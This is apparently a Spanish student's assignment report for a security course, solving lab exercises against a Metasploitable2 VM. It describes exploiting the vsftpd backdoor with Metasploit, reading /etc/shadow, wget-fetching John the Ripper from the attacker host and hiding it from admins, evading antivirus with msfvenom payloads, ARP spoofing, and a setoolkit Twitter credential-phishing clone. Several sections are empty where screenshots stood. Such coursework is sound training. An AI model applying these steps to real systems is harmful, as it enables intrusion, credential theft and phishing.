Documentos de Académico
Documentos de Profesional
Documentos de Cultura
MSEGIN_M2T2_171123
0
Ejercicio 1
Enunciado
Realizar un proceso completo de intrusión sobre la máquina virtual proporcionada. Para ello
será necesario seguir las fases de una auditoria sobre sistemas. En el proceso el alumno
deberá hacer uso de herramientas como Nmap, Nessus, Metasploit, así como scripts de post-
explotación. La máquina virtual puede ser descargada del siguiente enlace:
https://downloads.sourceforge.net/project/metasploitable/Metasploitable2/metasploit
able-linux-2.0.0.zip
Todas las acciones deben realizarse desde otra máquina virtual con la distribución Kali Linux
o similar. Se deberá entregar los resultados obtenidos para la enumeración, análisis de
vulnerabilidades, explotación y post-explotación
Resolución
MSEGIN_M2T2_171123
1
Maquina Victima ( Metasploitable2 )
192.168.25.129
MSEGIN_M2T2_171123
2
2.- Utilización de NMAP
Desde el terminal de la máquina virtual Kali Linux nosotros vamos a realizar un barrido de la
IP con las IP del dominio para que la consulta nos devuelva todas las maquinas que se
encuentren dentro del dominio.
MSEGIN_M2T2_171123
3
3.- Utilización de Metasploit Framework (I)
Se Utilizara el framework de Metasploit
MSEGIN_M2T2_171123
4
Para poder transferir un archivo a la maquina atacada nosotros vamos a trabajar con un
servicio ftp que es el puerto 21 que encontramos abierta en el dispositivo de la víctima
llamado vsftpd, desde el terminal de metasploit vamos a ingresar “search vsftpd” que nos
mostrara el exploit disponible para poder ejecutar que es
“exploit/unix/ftp/vsftpd_234_backdoor”, utlizamos el exploit con el comando use.
Una vez dentro deberemos ingresar el Host a atacar utilizando el comando set RHOST y la ip
de la victima.
MSEGIN_M2T2_171123
5
Una vez configurado el RHOST con la ip de la victima podemos ejecutar el exploit con el
comando correspondiente (exploit)
Se puede visualizar que existe un comando Shell abierto que corresponde al ataque se esta
haciendo a la victima.
MSEGIN_M2T2_171123
6
Una vez obtenida la conexión con la victima nosotros vamos a realizar las siguientes
consultas.
Vamos a ejecutar el comando cat (permite leer datos de archivos y mostrar sus contenidos)
/etc/passwod (ira a la carpeta raíz, etc y buscara el archivo password)
Nos devuelve el listado de todos los usuarios que existen en el sistema, posteriormente
utilizaremos el comando cat /etc/shadow para ver las contraseñas encriptadas de los
usuarios.
MSEGIN_M2T2_171123
7
4.- Configuracion de FTP en Maquina Local
Por comando en terminal vamos a levantar nuestro servidor apache en la maquina local
MSEGIN_M2T2_171123
8
1.- Edicion de Index.html
Una vez que tengamos el servicio apache arriba nosotros vamos a realizar una prueba, vamos
a ir donde se almacenan los archivos que está sirviendo nuestro servidor del FTP, editando el
html index dejando alguna breve descripción
MSEGIN_M2T2_171123
9
Desde el navegador iremos a la ip 127.0.0.1 que es la dirección local verificando que el servicio
se encuentra arriba
MSEGIN_M2T2_171123
10
2.- Configuration de “John the Ripper”.
Vamos a descargar la herramienta John que es un cracker de contraseña, vamos a guardarlo
en la maquina local.
Una vez descargado el archivo vamos a renombrar el archivo a John.tar.gz y lo vamos a copiar
a nuestro servidor FTP dentro de una carpeta “tools”
MSEGIN_M2T2_171123
11
MSEGIN_M2T2_171123
12
5.- Utilización de Metasploit Framework (II)
Desde la maquina vulnerada vamos a utilizar el comando wget con la maquina atacante
mediante http (por FTP) “wget http://192.168.25.128/tools/john.tar.gz” que descargara el
archivo desencriptador en la maquina atacada.
MSEGIN_M2T2_171123
13
Es por eso que nosotros moveremos el archivo a la carpeta opt, simplemente con la intención
de esconderlo para que un administrador del sistema y no vea un archivo desconocido (John),
posteriormente descomprimimos el archivo. Con el comando “tar xvzf john.tar.gz”
MSEGIN_M2T2_171123
14
Una vez descomprimido el archivo accederemos a la carpeta del password cracker y veremos
que existen 3 carpetas doc, run y src, accederemos a la carpeta src que encontraremos un
monton de archivos .c
MSEGIN_M2T2_171123
15
Y vamos a “instalar John the Ripper password cracker” en la maquina de la victim con el
comando “make generic”
MSEGIN_M2T2_171123
16
Vamos a ejecutar el comando “./unshadow /etc/passwd /etc/shadow > tocrack.txt” para
generar un archivo con la password desencriptada de los usuarios de la maquina vulnerada,
posteriomente de generar el archivo vamos a ejecutar el comando “./John tocrack.txt” para
que pueda crackear las credenciales mostrándonos las contraseñas de los usuarios de la
victima
MSEGIN_M2T2_171123
17
Ejercicio 2
Enunciado
Investigar las diferentes conexiones que permite el uso del payload Meterpreter en sistemas
Windows. Detallar la funcionalidad de cada una de ellas de forma general y profundizar en el
uso de 3 de ellas.
Resolución
Ejercicio 3
Enunciado
MSEGIN_M2T2_171123
18
los 3 binarios para Windows definidos en detalle en el ejercicio anterior y comprobar su
funcionamiento en un sistema Windows sin sistemas de seguridad y/o antivirus.
Resolución
1.- Creacion de MSFVenom
MSEGIN_M2T2_171123
19
Se ingresa el comando msfconsole
MSEGIN_M2T2_171123
20
2.- Preparacion para contaminar Maquina de la victima
Se comprime el ejecutable creado para poder pasarlo a la otra maquina virtual, ya que si se
trata de pasar de manera normal el sistema operativo de la maquina reconocerá la existencia
de un virus en la maquina y no dejara copiarla
MSEGIN_M2T2_171123
21
3.- Ataque
Realizaremos el ataque lanzándole un ataque con exploit
Una vez realizada la conexión nosotros tendremos acceso a su maquina, con la disponibilidad
de realizar las consultas con su terminal, como mostramos en el ejemplo siguiente
detectamos IP,
MSEGIN_M2T2_171123
22
Ejercicio 4
Enunciado
Resolución
Análisis de Vulnerabilidades del Router del Alumno con Nessus
MSEGIN_M2T2_171123
23
MSEGIN_M2T2_171123
24
Ejercicio 5
Enunciado
Desarrollar un ataque MiTM mediante el uso de la técnica ARP Spoofing en la red doméstica
del alumno. Se debe verificar que el tráfico de las víctimas es interceptado por la maquina
atacante.
Resolución
1.- Explicacion Man in the Middle
El concepto de un ataque MiTM es muy sencillo. Además, no se limita únicamente al ámbito
de la seguridad informática o el mundo online. Este método sólo necesita que el atacante se
sitúe entre las dos partes que intentan comunicarse; interceptando los mensajes enviados e
imitando al menos a una de ellas.
MSEGIN_M2T2_171123
25
2.- Preparacion Men in the middle
MSEGIN_M2T2_171123
26
3.- Preparacion de Ingenieria social
La ingenieria social, es la técnica que consigue engañar al usuario para obtener algo, para este
ejercicio lo que vamos a realizar es simular la página web de Twitter pero que en realidad es
nuestro Kali con un apache. Para este tutorial se va a utilizar la herramienta setoolkit que es
una herramienta extremadamente fácil de utilizar y que funciona muy bien.
Para empezar, vamos a abrir la terminal e ingresaremos el comando setoolkit
MSEGIN_M2T2_171123
27
Seleccionaremos la opción 1 que es la que mas se ajusta a nuestras necesidades
MSEGIN_M2T2_171123
28
Indicamos con la opción 3 que queremos hacer un ataque de credenciales
MSEGIN_M2T2_171123
29
3.- Seleccionamos 3
Esto nos pide la IP del Kali linux, si el ataque se quiere efectuar contra una persona que esté
en la red privada, vale con poner esta. Si se quiere ir contra una persona de fuera de la red,
hay que poner la IP pública y natear el puerto 80 en el router hacia la máquina kali.
MSEGIN_M2T2_171123
30
Y ya estaría en marcha, ahora para acceder a la web fake, hay que meter la IP del kali en el
navegador 192.168.25.128
Para realizar un ataque nosotros vamos a trabajar con la DNS que utilizaremos para el ataque
es por eso que accederemos al archivo hosts.txt
MSEGIN_M2T2_171123
31
Ingresaremos la IP de la maquina atacante con una url.
MSEGIN_M2T2_171123
32
4.- Acceso de la Victima a la página falsa Ingeniería social
Desde la maquina victima accederemos a la dns configurada, pudiendo accesar a la maqueta
creada de la clonación de la web
5.- Resultados
Se puede detectar las credenciales de la víctima registrada.
MSEGIN_M2T2_171123
33
Ejercicio 6
Enunciado
Investigar los principales vectores de ataque que permiten romper la seguridad de una red
WEP. Al menos se debe mostrar el detalle de 2 vectores diferentes.
Resolución
Existen dos tipos de vectores de ataques que permiten romper la seguridad de la red que son
los Ataques Activos y Pasivos que
Ataques activos
Spoofing: Se refiere al uso de técnicas para la suplantación de identidad.
Modificación: Consiste en modificar la tabla de enrutamiento del router con el fin de que el
remitente envíe su mensaje por un camino mas largo provocando gran retraso.
Ataques Pasivos
Sniffing o Análisis de tráfico: Un atacante intenta detectar la ruta de comunicación entre
remitente y el receptor. El atacante puede encontrar la cantidad de datos que se desplazan
entre la ruta del remitente y del receptor. No hay modificación en los datos.
Escuchas furtivas: Se produce en la red móvil ad-hoc. El objetivo principal de este ataque es
averiguar información secreta o confidencial de la comunicación.
Supervisión: Ataque donde se pueden leer datos confidenciales, pero no se pueden editar los
mismos.
MSEGIN_M2T2_171123
34
Referencias:
1.- Nmap: https://nmap.org/man/es/
2.- John the ripper: https://www.openwall.com/john/
MSEGIN_M2T2_171123
35